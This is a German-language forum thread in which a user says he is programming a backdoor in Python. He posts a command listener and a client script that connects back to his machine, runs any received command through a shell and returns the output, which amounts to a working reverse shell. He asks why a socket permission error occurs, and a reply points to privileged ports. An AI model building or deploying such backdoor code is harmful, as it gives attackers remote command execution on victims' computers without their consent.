Fehlermeldung: Zugriff auf einen Socket aufgrund von Zugriffsrecht unzulässig

Sockets, TCP/IP, (XML-)RPC und ähnliche Themen gehören in dieses Forum
Antworten
Raphael_155
User
Beiträge: 7
Registriert: Sonntag 12. September 2021, 06:01

Samstag 20. November 2021, 19:41

Ich bin gerade dabei mit Python eine Backdoor zu programmieren, dafür habe ich natürlich einen Server, da ich die Daten natürlich irgendwie übertragen muss. Ich schickte jetzt erstmal den Code:

Server Code:


import socket

host = "meine IP(da steht natürlich meine echte ;D)"
print(host)
port = 22

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host,port))
s.listen(3)
connection,addr = s.accept()
print("Verbunden mit " + addr[0])
data = connection.recv(2024)
print(data)

while True:
cmd = input("Command: ")
connection.send(str.encode(cmd))
data = connection.recv(2024)
print(data.decode("utf-8"))

connection.close()





Backdoor Code:


import socket
import subprocess

host = "meine IP(da steht natürlich meine echte ;D)"
port = 22

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(str.encode("Backdoor Running"))

while True:
data = s.recv(2024)
proc = subprocess.Popen(data.decode("utf-8"), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr= subprocess.PIPE)

stdout = proc.stdout.read()
stderr = proc.stderr.read()
s.send(stdout)
s.send(stderr)
print(stdout)
print(stderr)



Jedenfalls habe ich das ganze dann getestet und bekam folgende Fehlermeldung:
s.connect((host, port))
OSError: [WinError 10013] Der Zugriff auf einen Socket war aufgrund der Zugriffsrechte des Sockets unzulässig

Ich bin dann alles durchgegangen, habe jetzt gerade auch meine Firewall kurz abgestellt, da bei stackoverflow darüber was stand, das das daran liegt, das hat aber nicht funktioniert. Dazu muss ich noch sagen, dass ich sogar schon Server wo Nachrichten verschickt werden gemacht habe,(die basieren natürlich sehr ähnlich, wie den den ich jetzt machen will.) wo alles reibungslos funktioniert hat. Ich habe auch probiert diese Server jetzt auszuführen, und bei denen wird jetzt dasselbe angezeigt. Danke schonmal, hoffentlich könnt ihr mir helfen!

Liebe Grüße (:
__deets__
User
Beiträge: 10711
Registriert: Mittwoch 14. Oktober 2015, 14:29

Samstag 20. November 2021, 21:42

Port 22 ist priveligiert. Den darfst du nicht einfach öffnen. Wie keinen Port unter 1024. Du kannst also einfach eine weiter oben öffnen.
Raphael_155
User
Beiträge: 7
Registriert: Sonntag 12. September 2021, 06:01

Samstag 20. November 2021, 22:05

Dabei kommt genau dieselbe Fehlermeldung, ich habe es mit Port 5000 und 5555 versucht...
Antworten